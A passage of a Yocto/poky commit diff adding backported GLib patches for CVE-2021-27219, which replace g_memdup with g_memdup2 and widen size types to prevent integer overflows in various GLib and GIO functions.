node->class_closure_bsa = NULL; + if (accumulator) +--- a/gobject/gtype.c ++++ b/gobject/gtype.c +@@ -33,6 +33,7 @@ + + #include "glib-private.h" + #include "gconstructor.h" ++#include "gstrfuncsprivate.h" + + #ifdef G_OS_WIN32 + #include <windows.h> +@@ -1470,7 +1471,7 @@ type_add_interface_Wm (TypeNode + iholder->next = iface_node_get_holders_L (iface); + iface_node_set_holders_W (iface, iholder); + iholder->instance_type = NODE_TYPE (node); +- iholder->info = info ? g_memdup (info, sizeof (*info)) : NULL; ++ iholder->info = info ? g_memdup2 (info, sizeof (*info)) : NULL; + iholder->plugin = plugin; + + /* create an iface entry for this type */ +@@ -1731,7 +1732,7 @@ type_iface_retrieve_holder_info_Wm (Type + INVALID_RECURSION ("g_type_plugin_*", iholder->plugin, NODE_NAME (iface)); + + check_interface_info_I (iface, instance_type, &tmp_info); +- iholder->info = g_memdup (&tmp_info, sizeof (tmp_info)); ++ iholder->info = g_memdup2 (&tmp_info, sizeof (tmp_info)); + } + + return iholder; /* we don't modify write lock upon returning NULL */ +@@ -2016,10 +2017,10 @@ type_iface_vtable_base_init_Wm (TypeNode + IFaceEntry *pentry = type_lookup_iface_entry_L (pnode, iface); + + if (pentry) +- vtable = g_memdup (pentry->vtable, iface->data->iface.vtable_size); ++ vtable = g_memdup2 (pentry->vtable, iface->data->iface.vtable_size); + } + if (!vtable) +- vtable = g_memdup (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size); ++ vtable = g_memdup2 (iface->data->iface.dflt_vtable, iface->data->iface.vtable_size); + entry->vtable = vtable; + vtable->g_type = NODE_TYPE (iface); + vtable->g_instance_type = NODE_TYPE (node); +--- a/gobject/gtypemodule.c ++++ b/gobject/gtypemodule.c +@@ -19,6 +19,7 @@ + + #include <stdlib.h> + ++#include "gstrfuncsprivate.h" + #include "gtypeplugin.h" + #include "gtypemodule.h" + +@@ -436,7 +437,7 @@ g_type_module_register_type (GTypeModule + module_type_info->loaded = TRUE; + module_type_info->info = *type_info; + if (type_info->value_table) +- module_type_info->info.value_table = g_memdup (type_info->value_table, ++ module_type_info->info.value_table = g_memdup2 (type_info->value_table, + sizeof (GTypeValueTable)); + + return module_type_info->type; +--- a/gobject/tests/param.c ++++ b/gobject/tests/param.c +@@ -2,6 +2,8 @@ + #include <glib-object.h> + #include <stdlib.h> + ++#include "gstrfuncsprivate.h" ++ + static void + test_param_value (void) + { +@@ -874,7 +876,7 @@ main (int argc, char *argv[]) + test_path = g_strdup_printf ("/param/implement/subprocess/%d-%d-%d-%d", + data.change_this_flag, data.change_this_type, + data.use_this_flag, data.use_this_type); +- test_data = g_memdup (&data, sizeof (TestParamImplementData)); ++ test_data = g_memdup2 (&data, sizeof (TestParamImplementData)); + g_test_add_data_func_full (test_path, test_data, test_param_implement_child, g_free); + g_free (test_path); + } diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch new file mode 100644 index 0000000000..6a3ac6b552 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch @@ -0,0 +1,298 @@ +Backport of: + +From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:41:21 +0000 +Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious + places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()` or an existing `gsize` +variable), so that they use `g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it + +In particular, this fixes an overflow within `g_bytes_new()`, identified +as GHSL-2021-045 by GHSL team member Kevin Backhouse. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Fixes: GHSL-2021-045 +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/gbytes.c | 6 ++++-- + glib/gdir.c | 3 ++- + glib/ghash.c | 7 ++++--- + glib/giochannel.c | 5 +++-- + glib/gslice.c | 3 ++- + glib/gtestutils.c | 3 ++- + glib/gvariant.c | 7 ++++--- + glib/gvarianttype.c | 3 ++- + glib/tests/array-test.c | 4 +++- + glib/tests/option-context.c | 6 ++++-- + glib/tests/uri.c | 8 +++++--- + 11 files changed, 35 insertions(+), 20 deletions(-) + +--- a/glib/gbytes.c ++++ b/glib/gbytes.c +@@ -34,6 +34,8 @@ + + #include <string.h> + ++#include "gstrfuncsprivate.h" ++ + /** + * GBytes: + * +@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data, + { + g_return_val_if_fail (data != NULL || size == 0, NULL); + +- return g_bytes_new_take (g_memdup (data, size), size); ++ return g_bytes_new_take (g_memdup2 (data, size), size); + } + + /** +@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes, + * Copy: Non g_malloc (or compatible) allocator, or static memory, + * so we have to copy, and then unref. + */ +- result = g_memdup (bytes->data, bytes->size); ++ result = g_memdup2 (bytes->data, bytes->size); + *size = bytes->size; + g_bytes_unref (bytes); + } +--- a/glib/gdir.c ++++ b/glib/gdir.c +@@ -37,6 +37,7 @@ + #include "gconvert.h" + #include "gfileutils.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gtestutils.h" + #include "glibintl.h" + +@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path + return NULL; + #endif + +- return g_memdup (&dir, sizeof dir); ++ return g_memdup2 (&dir, sizeof dir); + } + + /** +--- a/glib/ghash.c ++++ b/glib/ghash.c +@@ -34,6 +34,7 @@ + #include "gmacros.h" + #include "glib-private.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gatomic.h" + #include "gtestutils.h" + #include "gslice.h" +@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + if (hash_table->have_big_keys) + { + if (key != value) +- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size); + /* Keys and values are both big now, so no need for further checks */ + return; + } +@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + { + if (key != value) + { +- hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size); + is_a_set = FALSE; + } + } +@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + + /* Just split if necessary */ + if (is_a_set && key != value) +- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size); + + #endif + } +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -35,7 +35,7 @@ + #include <errno.h> + + #include "giochannel.h" +- ++#include "gstrfuncsprivate.h" + #include "gstrfuncs.h" + #include "gtestutils.h" + #include "glibintl.h" + +@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel *cha + + /* Copy the read bytes (including any embedded nuls) and nul-terminate. + * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a +- * #GString, so it’s safe to call g_memdup() with +1 length to allocate ++ * #GString, so it’s safe to call g_memdup2() with +1 length to allocate + * a nul-terminator. */ + g_assert (USE_BUF (channel)); +- line = g_memdup (USE_BUF (channel)->str, got_length + 1); ++ line = g_memdup2 (USE_BUF (channel)->str, got_length + 1); + line[got_length] = '\0'; + *str_return = g_steal_pointer (&line); + g_string_erase (USE_BUF (channel), 0, got_length); +--- a/glib/gslice.c ++++ b/glib/gslice.c +@@ -41,6 +41,7 @@ + #include "gmain.h" + #include "gmem.h" /* gslice.h */ + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gutils.h" + #include "gtrashstack.h" + #include "gtestutils.h" +@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c + array[i++] = allocator->contention_counters[address]; + array[i++] = allocator_get_magazine_threshold (allocator, address); + *n_values = i; +- return g_memdup (array, sizeof (array[0]) * *n_values); ++ return g_memdup2 (array, sizeof (array[0]) * *n_values); + default: + return NULL; + } +--- a/glib/gtestutils.c ++++ b/glib/gtestutils.c +@@ -49,6 +49,7 @@ + #include "gpattern.h" + #include "grand.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gtimer.h" + #include "gslice.h" + #include "gspawn.h" +@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf + if (p <= tbuffer->data->str + mlength) + { + g_string_erase (tbuffer->data, 0, mlength); +- tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg))); ++ tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup2 (&msg, sizeof (msg))); + return TRUE; + } + +--- a/glib/gvariant.c ++++ b/glib/gvariant.c +@@ -33,6 +33,7 @@ + + #include <string.h> + ++#include "gstrfuncsprivate.h" + + /** + * SECTION:gvariant +@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value) + g_variant_ref_sink (value); + + return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT, +- g_memdup (&value, sizeof value), ++ g_memdup2 (&value, sizeof value), + 1, g_variant_is_trusted (value)); + } + +@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian + return NULL; + } + +- data = g_memdup (elements, n_elements * element_size); ++ data = g_memdup2 (elements, n_elements * element_size); + value = g_variant_new_from_data (array_type, data, + n_elements * element_size, + FALSE, g_free, data); +@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu + if (length) + *length = size; + +- return g_memdup (original, size + 1); ++ return g_memdup2 (original, size + 1); + } + + /** +--- a/glib/gvarianttype.c ++++ b/glib/gvarianttype.c +@@ -28,6 +28,7 @@ + + #include <string.h> + ++#include "gstrfuncsprivate.h" + + /** + * SECTION:gvarianttype +@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant + g_assert (offset < sizeof buffer); + buffer[offset++] = ')'; + +- return (GVariantType *) g_memdup (buffer, offset); ++ return (GVariantType *) g_memdup2 (buffer, offset); + } + + /** +--- a/glib/tests/array-test.c ++++ b/glib/tests/array-test.c +@@ -29,6 +29,8 @@ + #include <string.h> + #include "glib.h" + ++#include "gstrfuncsprivate.h" ++ + /* Test data to be passed to any function which calls g_array_new(), providing + * the parameters for that call. Most #GArray tests should be repeated for all + * possible values of #ArrayTestData. */ +@@ -1917,7 +1919,7 @@ byte_array_new_take (void) + GByteArray *gbarray; + guint8 *data; + +- data = g_memdup ("woooweeewow", 11); ++ data = g_memdup2 ("woooweeewow", 11); + gbarray = g_byte_array_new_take (data, 11); + g_assert (gbarray->data == data); + g_assert_cmpuint (gbarray->len, ==, 11); +--- a/glib/tests/option-context.c ++++ b/glib/tests/option-context.c +@@ -27,6 +27,8 @@ + #include <string.h> + #include <locale.h> + ++#include "gstrfuncsprivate.h" ++ + static GOptionEntry main_entries[] = { + { "main-switch", 0, 0, + G_OPTION_ARG_NONE, NULL, +@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv) + static char ** + copy_stringv (char **argv, int argc) + { +- return g_memdup (argv, sizeof (char *) * (argc + 1)); ++ return g_memdup2 (argv, sizeof (char *) * (argc + 1)); + } + + static void +@@ -2323,7 +2325,7 @@ test_group_parse (void) + g_option_context_add_group (context, group); + + argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc); +- orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *)); ++ orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *)); + + retval = g_option_context_parse (context, &argc, &argv, &error); + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch new file mode 100644 index 0000000000..4f86522d00 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch @@ -0,0 +1,54 @@ +From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 16:12:24 +0000 +Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when + calculating a size +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e. +32-bit unsigned integers. Adding to and multiplying them may cause them +to overflow the unsigned integer bounds, even if the result is passed to +`g_memdup2()` which accepts a `gsize`. + +Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the +arithmetic is done in terms of `gsize`s rather than unsigned integers. + +Spotted by Sebastian Dröge. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/win32/gwinhttpfile.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c +index 3f8fbd838..e0340e247 100644 +--- a/gio/win32/gwinhttpfile.c ++++ b/gio/win32/gwinhttpfile.c +@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile *file, + child = g_object_new (G_TYPE_WINHTTP_FILE, NULL); + child->vfs = winhttp_file->vfs; + child->url = winhttp_file->url; +- child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); +- child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); +- child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); +- child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); ++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2); ++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2); ++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2); ++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2); + child->url.lpszUrlPath = wnew_path; + child->url.dwUrlPathLength = wcslen (wnew_path); + child->url.lpszExtraInfo = NULL; +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch new file mode 100644 index 0000000000..d8043f5e29 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch @@ -0,0 +1,101 @@ +From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:49:00 +0000 +Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as + gsize + +Previously it was handled as a `gssize`, which meant that if the +`stop_chars` string was longer than `G_MAXSSIZE` there would be an +overflow. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gdatainputstream.c | 25 +++++++++++++++++-------- + 1 file changed, 17 insertions(+), 8 deletions(-) + +diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c +index 2e7750cb5..2cdcbda19 100644 +--- a/gio/gdatainputstream.c ++++ b/gio/gdatainputstream.c +@@ -27,6 +27,7 @@ + #include "gioenumtypes.h" + #include "gioerror.h" + #include "glibintl.h" ++#include "gstrfuncsprivate.h" + + #include <string.h> + +@@ -856,7 +857,7 @@ static gssize + scan_for_chars (GDataInputStream *stream, + gsize *checked_out, + const char *stop_chars, +- gssize stop_chars_len) ++ gsize stop_chars_len) + { + GBufferedInputStream *bstream; + const char *buffer; +@@ -952,7 +953,7 @@ typedef struct + gsize checked; + + gchar *stop_chars; +- gssize stop_chars_len; ++ gsize stop_chars_len; + gsize length; + } GDataInputStreamReadData; + +@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream *stream, + { + GDataInputStreamReadData *data; + GTask *task; ++ gsize stop_chars_len_unsigned; + + data = g_slice_new0 (GDataInputStreamReadData); +- if (stop_chars_len == -1) +- stop_chars_len = strlen (stop_chars); +- data->stop_chars = g_memdup (stop_chars, stop_chars_len); +- data->stop_chars_len = stop_chars_len; ++ ++ if (stop_chars_len < 0) ++ stop_chars_len_unsigned = strlen (stop_chars); ++ else ++ stop_chars_len_unsigned = (gsize) stop_chars_len; ++ ++ data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned); ++ data->stop_chars_len = stop_chars_len_unsigned; + data->last_saw_cr = FALSE; + + task = g_task_new (stream, cancellable, callback, user_data); +@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream *stream, + gssize found_pos; + gssize res; + char *data_until; ++ gsize stop_chars_len_unsigned; + + g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL); + + if (stop_chars_len < 0) +- stop_chars_len = strlen (stop_chars); ++ stop_chars_len_unsigned = strlen (stop_chars); ++ else ++ stop_chars_len_unsigned = (gsize) stop_chars_len; + + bstream = G_BUFFERED_INPUT_STREAM (stream); + + checked = 0; + +- while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1) ++ while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1) + { + if (g_buffered_input_stream_get_available (bstream) == + g_buffered_input_stream_get_buffer_size (bstream)) +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch new file mode 100644 index 0000000000..f183939c45 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch @@ -0,0 +1,76 @@ +From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:50:37 +0000 +Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup() +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows it to handle strings up to length `G_MAXSIZE` — previously +it would overflow with such strings. + +Update the several copies of it identically. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++-------- + 2 files changed, 38 insertions(+), 16 deletions(-) + +diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c +index 548a94188..2eb67daf8 100644 +--- a/gio/gwin32registrykey.c ++++ b/gio/gwin32registrykey.c +@@ -127,16 +127,34 @@ typedef enum + G_WIN32_REGISTRY_UPDATED_PATH = 1, + } GWin32RegistryKeyUpdateFlag; + ++static gsize ++g_utf16_len (const gunichar2 *str) ++{ ++ gsize result; ++ ++ for (result = 0; str[0] != 0; str++, result++) ++ ; ++ ++ return result; ++} ++ + static gunichar2 * +-g_wcsdup (const gunichar2 *str, +- gssize str_size) ++g_wcsdup (const gunichar2 *str, gssize str_len) + { +- if (str_size == -1) +- { +- str_size = wcslen (str) + 1; +- str_size *= sizeof (gunichar2); +- } +- return g_memdup (str, str_size); ++ gsize str_len_unsigned; ++ gsize str_size; ++ ++ g_return_val_if_fail (str != NULL, NULL); ++ ++ if (str_len < 0) ++ str_len_unsigned = g_utf16_len (str); ++ else ++ str_len_unsigned = (gsize) str_len; ++ ++ g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1); ++ str_size = (str_len_unsigned + 1) * sizeof (gunichar2); ++ ++ return g_memdup2 (str, str_size); + } + + /** +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch new file mode 100644 index 0000000000..ffafc35c07 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch @@ -0,0 +1,101 @@ +From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:58:32 +0000 +Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when + converting paths + +Previously, the code in `convert_path()` could not handle keys longer +than `G_MAXINT`, and would overflow if that was exceeded. + +Convert the code to use `gsize` and `g_memdup2()` throughout, and +change from identifying the position of the final slash in the string +using a signed offset `i`, to using a pointer to the character (and +`strrchr()`). This allows the slash to be at any position in a +`G_MAXSIZE`-long string, without sacrificing a bit of the offset for +indicating whether a slash was found. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gkeyfilesettingsbackend.c | 21 ++++++++++----------- + 1 file changed, 10 insertions(+), 11 deletions(-) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index cd5765afd..25b057672 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -33,6 +33,7 @@ + #include "gfilemonitor.h" + #include "gsimplepermission.h" + #include "gsettingsbackendinternal.h" ++#include "gstrfuncsprivate.h" + #include "giomodule-priv.h" + #include "gportalsupport.h" + +@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend *kfsb, + gchar **group, + gchar **basename) + { +- gint key_len = strlen (key); +- gint i; ++ gsize key_len = strlen (key); ++ const gchar *last_slash; + + if (key_len < kfsb->prefix_len || + memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0) +@@ -155,38 +156,36 @@ convert_path (GKeyfileSettingsBackend *kfsb, + key_len -= kfsb->prefix_len; + key += kfsb->prefix_len; + +- for (i = key_len; i >= 0; i--) +- if (key[i] == '/') +- break; ++ last_slash = strrchr (key, '/'); + + if (kfsb->root_group) + { + /* if a root_group was specified, make sure the user hasn't given + * a path that ghosts that group name + */ +- if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0) ++ if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0) + return FALSE; + } + else + { + /* if no root_group was given, ensure that the user gave a path */ +- if (i == -1) ++ if (last_slash == NULL) + return FALSE; + } + + if (group) + { +- if (i >= 0) ++ if (last_slash != NULL) + { +- *group = g_memdup (key, i + 1); +- (*group)[i] = '\0'; ++ *group = g_memdup2 (key, (last_slash - key) + 1); ++ (*group)[(last_slash - key)] = '\0'; + } + else + *group = g_strdup (kfsb->root_group); + } + + if (basename) +- *basename = g_memdup (key + i + 1, key_len - i); ++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); + + return TRUE; + } +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch new file mode 100644 index 0000000000..8efb7c720f --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch @@ -0,0 +1,100 @@ +From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 14:00:53 +0000 +Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?= + =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?= +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Don’t use an `int`, that’s potentially too small. In practical terms, +this is not a problem, since no socket address is going to be that big. + +By making these changes we can use `g_memdup2()` without warnings, +though. Fewer warnings is good. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gsocket.c | 16 ++++++++++------ + 1 file changed, 10 insertions(+), 6 deletions(-) + +--- a/gio/gsocket.c ++++ b/gio/gsocket.c +@@ -75,6 +75,7 @@ + #include "gcredentialsprivate.h" + #include "glibintl.h" + #include "gioprivate.h" ++#include "gstrfuncsprivate.h" + + #ifdef G_OS_WIN32 + /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */ +@@ -174,7 +175,7 @@ static gboolean g_socket_datagram_ba + GError **error); + + static GSocketAddress * +-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len); ++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len); + + static gssize + g_socket_receive_message_with_timeout (GSocket *socket, +@@ -260,7 +261,7 @@ struct _GSocketPrivate + struct { + GSocketAddress *addr; + struct sockaddr *native; +- gint native_len; ++ gsize native_len; + guint64 last_used; + } recv_addr_cache[RECV_ADDR_CACHE_SIZE]; + }; +@@ -5259,14 +5260,14 @@ g_socket_send_messages_with_timeout (GSo + } + + static GSocketAddress * +-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len) ++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len) + { + GSocketAddress *saddr; + gint i; + guint64 oldest_time = G_MAXUINT64; + gint oldest_index = 0; + +- if (native_len <= 0) ++ if (native_len == 0) + return NULL; + + saddr = NULL; +@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str + { + GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr; + gpointer tmp_native = socket->priv->recv_addr_cache[i].native; +- gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len; ++ gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len; + + if (!tmp) + continue; +@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str + g_free (socket->priv->recv_addr_cache[oldest_index].native); + } + +- socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len); ++ socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len); + socket->priv->recv_addr_cache[oldest_index].native_len = native_len; + socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr); + socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time (); +@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G + /* do it */ + while (1) + { ++ /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */ ++ G_STATIC_ASSERT (sizeof addr <= G_MAXINT); ++ + addrlen = sizeof addr; + if (address) + result = WSARecvFrom (socket->priv->fd, diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch new file mode 100644 index 0000000000..63fda0b600 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch @@ -0,0 +1,59 @@ +From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 14:07:39 +0000 +Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 